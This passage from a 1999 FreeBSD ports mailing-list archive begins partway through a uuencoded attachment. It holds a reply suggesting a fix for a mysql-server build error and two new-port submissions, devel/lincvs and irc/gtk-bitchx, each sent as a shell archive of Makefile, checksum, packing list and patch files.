M>^W!/F72$'W:-`$C.5M+6E7XF+AO=)J$++F5B>0-H2T4%-3,?J"62^L#^U6* M!'N=^L*"7:6=-9`>3EKMICI?$C/<>*-3E1&`=^+=^`@PPW'OLH=&6+,10B7Y MY8^IAL^Q&]70PD(0*97(]=^\_L0H9PQN(5P)H$,H3Q[Y!]*P5U6Q%)H'K_K:ZI\CA4&6\'X4^;_=YDRKX!,J'^H*%".*F4#PYJ M:D`Z%U`QB?)A>6_+-JD(D)II66%W@PTD\KI&J,(J%K=@@5%%4L^BL8ID!^LV M%QOJYX/F'`K4T#00"=>ZG<>&IQ@R2&3^T@K@U8DM#C"41_"`V1VU+#:X[8I- M]D.=,[P%2OY1.7MHO#\\^;4)*&N_@7Y!Z&2B)\`P^'#PH7%T].&H;M;Z`H@^ M(,%W?CUI_/QF[^1UP&I#%\2&,=E8P,Z+E##D"KAG+I()UXC>GA>D>BJ9^2%: MZ/N&2T0=NH18?C6)7+U8CNL=D3G;2O)XX]WV;F8W3().AG@X#,@U/5!!<%K# M,7+I]09!-`SEQ/[#2:.F8MXYX@M12H"9X-?X6H;T,(M(L8BYD'D!3Y$1&UV& M'!AM6$%&MN*$O,^$ZYM7&4RERFE60XS4A@FB\RJ)C?UB4"%?[0@X=;3&X:7` MGT;L&Y/\<)6#D>,&.V)M[KPYH?2Y'AO_>`OZB.8LEAU2*0K>X8!TD7U!=E3L M@+!81)I(`BZ+(+_T.C;(\J@0[(U51(;D7.]?J&#>)T#VL/VM(+G_D=IY=O\? MF9V"_J@4\8@\D3"]QJ?M)K_%\E^M&LV/4;NJ`I(V_:U/J8-4-_67U$^KW32^G,9`7HC9RF#Q>Z^Y=I=9-=\D2"C`'A9Q@+**/9BKZ@H'# MP$XAQ-M#81_5D2.YW3P!.O)W?F>]:0(1P`-SS8$<7ZJP^P>O/)U MIYHZH$D:;RZG?DHMIUZG6C+&6&JO\6W]$J=GLT]ANO+!DL!KGMKZA\9+?(4I M&]G&R]1X(_5R)3RG!B$0'B]T#L=KF8)N).6*8,AP/A@C[(:"O1O(BG1.3E/& MCC7S"FMZ")A53'E&\(`+X%ASN/>FM,NA`GE&JG[J)O76G-GBV:MB=$:>?(8' M)SCU71[?JD^4D-&=+M!RZQ-;"Z:#V81212BB3[GX+"7,4I)9=.TY/1?9PQ)R.H^B>#<6H(E.I\8,DA+(M9??,]JW) M]"Z_-XDMEDDB[+9.K3?G0')3-6V1CJ,MJ*_/>H.(Y]8$5-?+BRL#L;40-A0= MH0,XSF$K"G(#!KOBP?.G=QX^.)YT_CSF]$E\ET1A?"]MT4L^B$PQ,TRRV%!B M9EC<*]N*.+0FZ'X7RN7$5>3@4;`21<37)AFQ@*U>FZ=-X&L1>Q(;A+%G0%VX M]AX=:AB'`:N`53Y%'PPT^%RJITZ0=RO5WU,_I3^EK]/;1NA(CD6JIL>,:U'Y M:=>ER)*2Y<=76RGOQY(*=IK*XRRCJVEZ]PG>?N"4(J>\3+FI,;6+P5NWN(73 M3]0[H](#/`.I*'5TY6/J;5)G(64WO0U'0EUUF-UT4_B,L.B2C,*Q=_@V_F71 M=%T0MSTE2N5$3)+W49_I&E9)K)\K"=A$'&Z?G#2.#D1F>*&\MZ%_+4=X[?9P MS%>\0W'\Z\')]B]+++P[HC8F8C@@\1KY)Q'D75I==6'7/LN+W^=Y-$(E#A%A M>#)KM_T)RJ182ZK*`D+TF;%J&F?&77$I`7S7ZU!<@R9']MT0%X`*@FNHF./` M#9QL`PY&YITJH(C(==,E;+`O$D3D.P#*;Y57XC+%H<;>5Z.])P36&)#K=@H9 M]\6'GO_FPR$YG%UVQ63DM4G]932;=*6\&+!_#<7\D;L]P<=%7@;PIG62[I>4 M?T"41OG3NBA7!`"N2)2Z]%?@JHDQI0E3HQ,VW&I&BI::T4UWA:2ZOJ_BHZ ML[L`"JP?\*4+8"%NO)$:J@4S+)MHS1=(!'/PN/QT55>/[9=QB$O'!Q/M,,G: M4YZA-V%H-+@5EUQ]N*LH,Z]$H2KD:LC:+NC6?S`U+C6C1^?#H"U"4X@?0!,4 M$$18X0,R\T[SN=(D1T>!,3>)+S=%;Z(V"8J^T6&Q-^"XB@KH@FL'=!9N1R8A MR`_=#(@@I%$,B)8DB+)D2\$J!U!2(V\>;?\L1R]BYA6&<08\UV5W*OQ)VQOY M9I3='F"DCB_/.=RO?*A8JPZPOHJKOE+*NS&XY!'KQY$0$Q8PM(BNY:W8_,0* MOGBN0U/AA@+7V4(N*[93R*50R0I/%:FX9$5Q(B:P[2I-DB`^'WXR>%OGB#B1 MO)L@DC>+FR=!V[5:-94;0I'.'I3<<;9(Y?'T9=!0S-MO"CPJ)3XGUZIYUTT" M#Q,:2&+.P"!WJW7+JI=GSM(D+@O>R;;#"_(M'N&@#O%P>"V\KL]152>^KYW: M>8*OPNGF=*KDZJ0@&3]=7^@N56^M&M8TU=[_NW[TI)R! MM''[Z!\$)Y2O_%XCO0)TRR7.Z.`.=7A;??]FLB7,$''8'-*G(U2\<4V=AH0A M9"D[ZK#$YOF:@)IL90H`]H1\@CRB6ZH6?QGE"6,:B,!`#\:FC;1AH2J\\@=: M)1-L;8H=]4^,(K\9(T,B*X0I]4`>A3`?A]%PH-@8++$AVM%G%<_I/%RWZA(! MM.:NY]V`_M.Q#-^CGO&($84O/A>>Q]%]3SKS$N%M^@<@*184_L\"2ON?"4#6 M*L0?K%%LQ412B>^[I^-3#"?$092:[[=_:;YK'.P3"4^WWX\@EI(7U4D\U5T5 MT$\9R)19LQH#0:XE]SDWV9PQP\Q^/*"YK7_GR1HES?`DK3\^=^VY4[>/ M2J1$KC6!@>AF3"3^%^\N8"D6$NE!;%^%+$W.5).9'E@<,4_N82\V5%E_XB)_ MT^M+BI-NM53.)[(A7Q,J3^S@8S@-8YX-XVKH8<:$OV^5+XA M*0Z2O\27Q!,;R!&9C&!8_]Y6<67U^9@BH7X`V3T41B#7!!WZ4K%,W&&I[)8C MW"'*5VY'?EM%#3$5BC^W%>T4CA'U,1:.%2OL8+%,5^@QQYR2*I!@H-_/ M5A*#H?!OH4/:")2\FZ.(#*T>IU%.C&93.A5O4E&A9V&=8:.T%@\;D00,`2.% MLL,!-(QB31(C70S[_>$79=\D.ZCMD5#N:HE529\U:W=J(UZ#+`"+:!'@)?!B M?"NN8(FQO-)EK,56[L3)IGB>>43L0A&X;G_D3\GU09CGY9GD2`RE,AP&U>A, MAA&H$4G9-8!BY^.KYN''X]4NXW1ZT(X.T:SL&HU1H1\26I/ZZ52((2Y6U M-4401E7Y-=TNK0R4BKNA1CG*\Y*H$XMDJ98Z9KRFICP0S:I(>Y\]!W,\C5*1 MIG3%+1LR;9/2^9D5QZU#+^/`!OFB-@%D.B(A"L(D.](W(@U<:&E*!B7_@#>] M]C50V>C!W)^@Y:N#1MPWP?U"U)9`9`^;AR='(@-''>`\:(1LOP\;!WL.].)G M5$V>S&[\0+92*K&*=PE=T&MB//9F7UAFB/)BZI77ZZ/PEVTH.CY0#F./?7*@ MH/3&:X^'$\#@PVD7:M4F%Q=PS-]X(\PC^[%:KN9=C)>Y7H:C(7IM0,Y1U!T+ M0YQ6N]CE9+Z@"BEU3N0I@'(ZKS=09V9(Y@R3<^Q'%B^*O4AX?R7]5HNLI1+I MUL45R1/@FXPYA28&1J=7X8M[WO]0EWEU[T0%*G*F3J_.M?-APR0J05=A(8;1 MS"OM#FV,A"?^2)WXNECRG%KCK;WH`]\D;72%36TDI-P7/%50\`AK^53#H55&K%BSHRP7807S%+#AV5K$>O";=/2:O-IC,JL>8 M%?-)&7M%S+[Q`4V-AA.Y5BZ'XI!I.4F];;)RE^NH+J\14P=]=EY#,?FH\$4"#8QRQ01`!2C#J$W*^"QO"$(.'[WV_&:TG#-JR M=34:CY%LZ)L%;+E0T!>G:IUD:.V'5V?>(O`,)TUP$)`$.J6SK>JJY2X_ZJ8RJ5^2J5* M>_L;+PNI?&I1Z8%FNK-+GW?5S;#C]S%_\:=R,;5/>J5;4HV]I-;4E#C"7'9GIL(,ID.C!2]/@A7,>B"D(PMF""U_P%UN?WMQ@@^Z;" MTJY5*9J0PFV\O?WXAG[0EE@TX_T7]-;SUZD)ZG\RY746FHY74Y/("V5ODZM M2)UD>3+B"O93KU*IU'5U)W6EU(A395CN[?1SU`.C/$2FQ$U/TJC,(Y.DSA=>K_^X4W'>:3BGN5C2PFQ:T.G! MT%25T+2VGB^M)D&3=+VAM`IATG8V4P=OIC_E43V]M41#^`?Z]3XYVEQJ^0:?/E6NHM9HQ4 MU-(K+4VJ`G5R4F=__>(9J;*+SS0H5D\?ZP3WN;#K>_O37U,9Z%J91F5J.\9N MKT`*%]UGUC3^PW9-%&P?@L!03TP(3&S5L6N2MC]"E=,;8DX)/4\&E2:)*AZ) MBL197BVR*[(B7L)48M260_/\`('`T8G0K$I.$%X8=$[Y?I',!*SGXG/[<$JV MH'B;^F"8)80`N*RW"IH$_J0!%Y[0NB+)H"(?&%$-*L[XG.Z\WR)/`C95B8=#$08 ME"<_>Z7(G:,ZQ2(73'!RFAZ)V#7!WH>3YD'CYW=O#AKD0LNXO(.E4\OB*'!P MZ>0#>"BO:;8M3O0FF&@J+%A<:'3?<@9E`X&"H[`A698T`UTGQI8LH7+#QBU< M>XQJ3&@5,+S\QY,W!_NJL?2$EP+[MB46L>U%()87%Q,7,JD*15<_:GS1MC3+ M$28A8JYJ8>GJ2M$DN$T!X*1K7PMJ8[TA=2R**^%^E&3'+S9$-22`X@W^S,2` M;7$?;07W>51\8E.]T?OD!X<57F"4:9)>W5!\5CUXCJ*%*5X[#2^"5*KS.2G: M(T33=5!$X:&'@I3)E'5S+V;]OBB7I.06?<-:5ZC*K#&(:H[W?::4D(4+I-J* M/$`[0238CER(J#M:WC+/S!W!22%;T)'M:B[&HYR1EJSLP-W,CJ2V@[!DFFB5 M8.%`&?EZE8^056T--0TM@W>>=-[D>+*Q1;L%)9T[>?DHA!`EQZ MRV/KGZ8W:&,X1Y2_V&AM5$*,)J^K'2<@-.A86$@Z$V@6$G%Z[`@V5&-A!",; M!U1*I$5-C$JG)+&%X8Q0N0,!7;I^Y(&ODOX?C'Q]58<>QT7!<5O#&[FGY;!Y MLR/GZ:ODZUB^&G>FQ96>H\:[$(],M+-.][1R'D4JA%7%WQC?P.G]T2WA84# MY)9QJ):3HX^-A\HG`K\R9&Q[J$?%3K')AG$X:E[P57[S:G:C3?$6;)1GS<^S M,-YUR?(J>=.RED5P>2IM'J)7#J'.*)A=+9?R59%;*:)0PE0&X4I)/R1,CVM:WB%FXW?-V?*\CU2F3 M4'\0B);E&5198W^>*Z6BQK-?I:9)U%ZC8%[&$0&O5B>LNR-;01;PHN]=3HC0 MWV_":=XXV&OL.6)+=PL8`+:";AY^.'[SB\Y#3LGL5SO;QV\P/D^RJ_YNC(O] M;JRK_FZ,J_[R7%?]X3`=Y6K(53_%K';7_M^[ZI\?L2.(I`,KWOCEL/GNS<[1 M]M&OS=?H7X3)L3SP;^6JH0J,P^\888,FW=Z%C$N,NH-*O0JC2_S60Z_.0`/7 M(64VR2OOH'+&.QTTBQ_[Y#3?PWSY0`>1;5V#AL3`9UP"XU*8%2//8/\UI)O@ MC9LSDH$6.91+:'?5M/!(LL,7GFAPUI*U^4"+:_3-B^OKVOJ MS`@G`3#?W#[:/\YXX\N)C+3TU%!22:&B#'_&@1]^G%[EO2LRPHF`[*`CR,8J@KZ4L)7:P!%0;(/JL= M2=W7[OIJZH`,;=DW=^0#$0ZA0GD#@5+'6(AE,F@-IF(U?-"JD,/STM=$:FTQ'HV^&6X M,,$F2H!IL`XE(I/EEC>]]`=+WI=K"TN%7X;P7OCU M$^(H1HJ:=&*IYA9KI4HTI*(\/7([C?TW!^*K],"_^-)O=X=B>'&Q6"<&(%44 MS_Y;+'_Z<1EG_>`5LNQE7AWI]'^12OR8[HA"@<3$N=Q`OQ:+J-YYM%%4"8^S]%$:!PGMNO"'NGH\\@=M%+/"3--(D0OU.1K" M(#EL)B],N^NWKY=@>6(63;^+A0;]]LG`$)0TS\2U6G&E5B[&P`)?:^7TXL-O M(&'Y+X8W440A30#N2B`DA+^%#2_IO#([2J;?=KV.=W''^9$8&Z/7%Q)`WPUG M>,X=MX?3J=A&CP43J'@)_X,*]-)?"![)-=>T!"=`**6/P"#4TQ"=]>[?&[]:MSG\+?^Z,TEP>G[*J,GIH19_"CT%"+GCOZD?[Z6]VUJ#LEEWW MEE5V*Y([Z-8G^)'2>?53\%(]Z9?!@,RG3[K&5##DI;;]^U;]QEFZO?M==E`] M=OCQM-4^[P0%U:-^6^B<^_*Y&#RW?>,9^J5*%UKP5-#OY`-7Y)W7\*$$#^?3)Z2.^A31A1IZW>\W-!/Y_3\[GJHGSN MJ'F];QO#5T]<><;Q+VI`YI7).BWY,]6JM7B,9V=J MD&<9&%FFI1ZR\&0]9.@=]/KL%O]Q\5;;D;.500CAJC(9SW%TO^&AE6D'SUZN ME6LCN`1[):OZZF6W5!U>ULD:OW/Z][V9?M\RGG+T)'O-CSG[<4L]G@((GV=K M[0[#2N:344U+M5"J.1DY83@X\P=VE;\SIY!T[F0[M+'4XLC$EKEBWCVLX'WG MWJ_Y:B@RP;FHJ87D,>G>8.&L?W%)/^!;80S$.W?8X.]&BI&0(6AQ?"['0_9: MW4O_HM,^[UW5NKTKWLDQ&7$E[Q&ZN$W=5Z>=->$/"D*SCHG8,KA#LY`ODI2! MLHXQ%92QL-X$P*`H?Q+S95IM@)U3OWON7-XO=1&K=;E&>-%)W?L7 MV15 MS:-29+HSZOOHT+E#YFM3_W9:FW4+,QZWG2'TF!=WOB?G9PE@`?]HX')K9QE, MR-.[,X>23J_/-:JQ-PR,T#&?3_^E\&_G>&3]JUS2)?@X2]DSM];RQSW\]P,3 M);/Q@5B>3<;+&!Q]LGSEC;R!/_&7D6!8'K&S0_XN>"TQ_S72*(^OC,0\&'ZV M[(I2J5:I2#%/]0?(F]LEB$ MTWOOVJ<`K;W!$CHA63B9^6)[-!:B@K1/::6V4L6:5@*Z*5PN7&2MMK(FBU"D M-HQ#E5O3T:AN/#0[=A]WMC9?\_?('LIW_4;P>?F$5DFL4!@-7W0$F M>'`-M&_AW<%&'UD<^A:%"0Q@]]6[[?WCC<('Z)W\_9*_J<$]3DIE.,V1CC?"?]F M-+U#4?[GR^=+/+GK*/K*K4L!F%#%:V@/"(\+JQU2(*_01(]`@(@T$2I*;#GI"*X_?-;@%OXZXA)UZC(9..C+[X#;;?G(]/V MD]!V.YG1?!!MM\-HNU@#GE*C;<5GDI">D*5"$SZC2F13Z=H4"I5K)2@M+T$) M5>K,842Y#BC:0)35(OG;S-%WF7'#)/T2%N)E.@5_TY>!8W7E\N'>'@O=X9MZ&"!6CEJ;.^];RR]WX$C!R8(T%XDSP\Y,VDY5"P74XS[ *\#\G:3!NAG,!`(9M ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 10:24:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from boromir.vpop.net (dns1.vpop.net [206.117.147.2]) by hub.freebsd.org (Postfix) with ESMTP id 235BB14F4F for ; Fri, 3 Dec 1999 10:24:17 -0800 (PST) (envelope-from mreimer@vpop.net) Received: from vpop.net (bilbo.vpop.net [216.160.82.65]) by boromir.vpop.net (8.9.1/8.9.1) with ESMTP id KAA17318; Fri, 3 Dec 1999 10:21:40 -0800 (PST) Message-ID: <38480A38.A83A9F72@vpop.net> Date: Fri, 03 Dec 1999 10:21:44 -0800 From: Matthew Reimer Organization: VPOP Technologies, Inc. X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 3.3-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: mitayai@bricsnet.com Cc: freebsd-ports@freebsd.org Subject: Re: mysql-server port build failing on 2.2.8-stable References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Try commenting out the following line in /usr/ports/databases/mysql322-server/Makefile: CONFIGURE_ARGS+=--enable-assembler Matt Will Mitayai Keeso Rowe wrote: > > I'm getting the following compiling this port on a 2.2.8-STABLE i386 > system... any ideas what's up? > > cc -DHAVE_CONFIG_H -I. -I. -I.. -I../mit-pthreads/include -I./../include -I. > ./include -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=6 > 4 -DDBUG_OFF -O2 -m486 -pipe -c strings.S > strings.s: Assembler messages: > strings.s:75: Error: no such 386 instruction: `clrl' > strings.s:114: Error: no such 386 instruction: `clrb' > strings.s:126: Error: no such 386 instruction: `clrl' > strings.s:143: Error: no such 386 instruction: `clrl' > strings.s:199: Error: no such 386 instruction: `clrb' > strings.s:309: Error: no such 386 instruction: `clrb' > strings.s:339: Error: no such 386 instruction: `clrb' > strings.s:404: Error: Illegal .size expression > *** Error code 1 > > Stop. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ports" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 10:30:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B97F14F4F for ; Fri, 3 Dec 1999 10:30:17 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA75944; Fri, 3 Dec 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 78CD514C95 for ; Fri, 3 Dec 1999 10:29:41 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 45C679B36; Fri, 3 Dec 1999 13:29:37 -0500 (EST) Message-Id: <19991203182937.45C679B36@pawn.primelocation.net> Date: Fri, 3 Dec 1999 13:29:37 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15245: New port: devel/lincvs Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15245 >Category: ports >Synopsis: New port: devel/lincvs >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 10:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: New port: devel/lincvs LinCVS is a QT2-based frontend to CVS >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # lincvs # lincvs/Makefile # lincvs/files # lincvs/files/md5 # lincvs/pkg # lincvs/pkg/PLIST # lincvs/pkg/COMMENT # lincvs/pkg/DESCR # lincvs/patches # lincvs/patches/patch-aa # echo c - lincvs mkdir -p lincvs > /dev/null 2>&1 echo x - lincvs/Makefile sed 's/^X//' >lincvs/Makefile << 'END-of-lincvs/Makefile' X# New ports collection makefile for: lincvs X# Version required: 0.2.2 X# Date created: 03 December 1999 X# Whom: Chris D. Faulhaber X# X# $FreeBSD$ X# X XDISTNAME= lincvs_0.2.2 XPKGNAME= lincvs-0.2.2 XCATEGORIES= devel kde XMASTER_SITES= http://ppprs1.phy.tu-dresden.de/~trogisch/lincvs/download/ X XMAINTAINER= jedgar@fxp.org X XUSE_QT2= yes XWRKSRC= ${WRKDIR}/LinCVS-0.2.2 X Xdo-configure: X @${PERL} -pi.orig -e 's|__X11BASE__|${X11BASE}|' ${WRKSRC}/Makefile X Xdo-install: X ${INSTALL_PROGRAM} ${WRKSRC}/LinCVS ${PREFIX}/bin/lincvs X ${MKDIR} ${PREFIX}/share/doc/lincvs X ${INSTALL_DATA} ${WRKSRC}/doc/index.html ${PREFIX}/share/doc/lincvs X ${INSTALL_DATA} ${WRKSRC}/doc/index-1.html ${PREFIX}/share/doc/lincvs X X.include END-of-lincvs/Makefile echo c - lincvs/files mkdir -p lincvs/files > /dev/null 2>&1 echo x - lincvs/files/md5 sed 's/^X//' >lincvs/files/md5 << 'END-of-lincvs/files/md5' XMD5 (lincvs_0.2.2.tar.gz) = 2469a7be85fe3d29a76b0664104dcf54 END-of-lincvs/files/md5 echo c - lincvs/pkg mkdir -p lincvs/pkg > /dev/null 2>&1 echo x - lincvs/pkg/PLIST sed 's/^X//' >lincvs/pkg/PLIST << 'END-of-lincvs/pkg/PLIST' Xbin/lincvs Xshare/doc/lincvs/index.html Xshare/doc/lincvs/index-1.html X@dirrm share/doc/lincvs END-of-lincvs/pkg/PLIST echo x - lincvs/pkg/COMMENT sed 's/^X//' >lincvs/pkg/COMMENT << 'END-of-lincvs/pkg/COMMENT' XGraphical CVS front-end using QT2 END-of-lincvs/pkg/COMMENT echo x - lincvs/pkg/DESCR sed 's/^X//' >lincvs/pkg/DESCR << 'END-of-lincvs/pkg/DESCR' XLinCVS is a QT2-based frontend for the CVS-client supporting Xboth CVS-versions 1.9 and 1.10, perhaps even older ones.... XIt allows to check out a module from and import of a module to a Xrepository, to update or retrieve the status of a working directory Xor single files and common operations like add, remove and commit, Xdiff against the repository or view of the log messages in list Xform. X XWWW: http://ppprs1.phy.tu-dresden.de/~trogisch/lincvs/lincvsen.html X X- Chris D. Faulhaber Xjedgar@fxp.org END-of-lincvs/pkg/DESCR echo c - lincvs/patches mkdir -p lincvs/patches > /dev/null 2>&1 echo x - lincvs/patches/patch-aa sed 's/^X//' >lincvs/patches/patch-aa << 'END-of-lincvs/patches/patch-aa' X--- Makefile.orig Fri Dec 3 10:45:01 1999 X+++ Makefile Fri Dec 3 11:18:26 1999 X@@ -7,15 +7,15 @@ X X ####### Compiler, tools and options X X-CC = gcc X-CXX = g++ X-CFLAGS = -pipe -Wall -W -O3 -DLINCVS_APP X-CXXFLAGS= -pipe -Wall -W -O3 -DLINCVS_APP X-INCPATH = -I./include -I./res -I./themes/include -I./themes/res -I$(QTDIR)/include X-LINK = g++ X+#CC = gcc X+#CXX = g++ X+CFLAGS+= -DLINCVS_APP X+CXXFLAGS= $(CFLAGS) X+INCPATH = -I./include -I./res -I./themes/include -I./themes/res -I__X11BASE__/include/qt2 X+LINK = $(CXX) X LFLAGS = X-LIBS = -L$(QTDIR)/lib -lqt -L/usr/X11R6/lib -lXext -lX11 -lm X-MOC = moc X+LIBS = -L__X11BASE__/lib -lqt2 -lXext -lX11 -lm X+MOC = __X11BASE__/bin/moc2 X X TAR = tar -cf X GZIP = gzip -9f END-of-lincvs/patches/patch-aa exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 11:42: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F3B231524D for ; Fri, 3 Dec 1999 11:41:59 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA80894; Fri, 3 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from norrgarden1.norrgarden.se (norrgarden1.norrgarden.se [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id B700714F55 for ; Fri, 3 Dec 1999 11:30:40 -0800 (PST) (envelope-from cj@norrgarden1.norrgarden.se) Received: (from root@localhost) by norrgarden1.norrgarden.se (8.9.3/8.9.3) id UAA55859; Fri, 3 Dec 1999 20:30:34 +0100 (CET) (envelope-from cj) Message-Id: <199912031930.UAA55859@norrgarden1.norrgarden.se> Date: Fri, 3 Dec 1999 20:30:34 +0100 (CET) From: calle.madestrand@norrgarden.se Reply-To: calle.madestrand@norrgarden.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15246: New port: irc/gtk-bitchx Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15246 >Category: ports >Synopsis: New port: irc/gtk-bitchx >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 11:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Carl Johan Madestrand >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: >Description: >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # /usr/ports/irc/gtk-bitchx # /usr/ports/irc/gtk-bitchx/pkg # /usr/ports/irc/gtk-bitchx/pkg/COMMENT # /usr/ports/irc/gtk-bitchx/pkg/DESCR # /usr/ports/irc/gtk-bitchx/pkg/PLIST # /usr/ports/irc/gtk-bitchx/files # /usr/ports/irc/gtk-bitchx/files/md5 # /usr/ports/irc/gtk-bitchx/Makefile # /usr/ports/irc/gtk-bitchx/patches # /usr/ports/irc/gtk-bitchx/patches/patch-aa # echo c - /usr/ports/irc/gtk-bitchx mkdir -p /usr/ports/irc/gtk-bitchx > /dev/null 2>&1 echo c - /usr/ports/irc/gtk-bitchx/pkg mkdir -p /usr/ports/irc/gtk-bitchx/pkg > /dev/null 2>&1 echo x - /usr/ports/irc/gtk-bitchx/pkg/COMMENT sed 's/^X//' >/usr/ports/irc/gtk-bitchx/pkg/COMMENT << 'END-of-/usr/ports/irc/gtk-bitchx/pkg/COMMENT' XBitchX IRC client with GTK frontend END-of-/usr/ports/irc/gtk-bitchx/pkg/COMMENT echo x - /usr/ports/irc/gtk-bitchx/pkg/DESCR sed 's/^X//' >/usr/ports/irc/gtk-bitchx/pkg/DESCR << 'END-of-/usr/ports/irc/gtk-bitchx/pkg/DESCR' XgtkBitchX is a port of PMBitchX to XWindows using the gtk X(Gimp Toolkit) windowing library. It includes all the features of XPMBitchX, except in a UNIX environment. X Xhttp://www.bitchx.org X XThis port by: X X- LoRd_CJ X calle.madestrand@norrgarden.se END-of-/usr/ports/irc/gtk-bitchx/pkg/DESCR echo x - /usr/ports/irc/gtk-bitchx/pkg/PLIST sed 's/^X//' >/usr/ports/irc/gtk-bitchx/pkg/PLIST << 'END-of-/usr/ports/irc/gtk-bitchx/pkg/PLIST' Xbin/gtkBitchX Xlib/bx/script/menu.bx Xlib/bx/BitchX.help Xlib/bx/BitchX.quit Xlib/bx/BitchX.reasons X@dirrm lib/bx END-of-/usr/ports/irc/gtk-bitchx/pkg/PLIST echo c - /usr/ports/irc/gtk-bitchx/files mkdir -p /usr/ports/irc/gtk-bitchx/files > /dev/null 2>&1 echo x - /usr/ports/irc/gtk-bitchx/files/md5 sed 's/^X//' >/usr/ports/irc/gtk-bitchx/files/md5 << 'END-of-/usr/ports/irc/gtk-bitchx/files/md5' XMD5 (BitchX-1.0c12.tar.gz) = 75af2dbd07da5d68230e09bb52185ea4 END-of-/usr/ports/irc/gtk-bitchx/files/md5 echo x - /usr/ports/irc/gtk-bitchx/Makefile sed 's/^X//' >/usr/ports/irc/gtk-bitchx/Makefile << 'END-of-/usr/ports/irc/gtk-bitchx/Makefile' X# New ports collection makefile for: gtkBitchX IRC client X# Version required: 1.0c12 X# Date created: 3 December 1999 X# Whom: LoRd_CJ X# X# $FreeBSD$ X XDISTNAME= BitchX-1.0c12 XPKGNAME= gtkBitchX-1.0 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.bitchx.com/pub/ \ X ftp://bitchx.dimension6.com/pub/ X XMAINTAINER= calle.madestrand@norrgarden.se X XLIB_DEPENDS= gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 \ X glib12.3:${PORTSDIR}/devel/glib12 \ X esd.2:${PORTSDIR}/audio/esound \ X Imlib.5:${PORTSDIR}/graphics/imlib \ X gnome.3:${PORTSDIR}/x11/gnomelibs X XGLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config XGTK_CONFIG?= ${X11BASE}/bin/gtk12-config XWRKSRC= ${WRKDIR}/BitchX X XMAN1= bitchx.1 XMANCOMPRESSED= yes X Xpre-patch: X @${CP} ${WRKSRC}/source/irc.c ${WRKSRC} X XGNU_CONFIGURE= yes XUSE_GMAKE= yes XCONFIGURE_ARGS= \ X --with-gtk \ X --with-plugins \ X --enable-sound X XCONFIGURE_ENV= GLIB_CONFIG="${GLIB_CONFIG}" \ X GTK_CONFIG="${GTK_CONFIG}" X Xdo-install: X ${MKDIR} ${PREFIX}/lib/bx X ${MKDIR} ${PREFIX}/lib/bx/script X ${INSTALL_PROGRAM} ${WRKSRC}/source/gtkBitchX ${PREFIX}/bin X ${INSTALL_DATA} ${WRKSRC}/script/menu.bx ${PREFIX}/lib/bx/script X ${INSTALL_DATA} ${WRKSRC}/BitchX.help ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.quit ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.reasons ${PREFIX}/lib/bx X ${INSTALL_MAN} ${WRKSRC}/doc/bitchx.1.gz ${PREFIX}/man/man1 X X.include 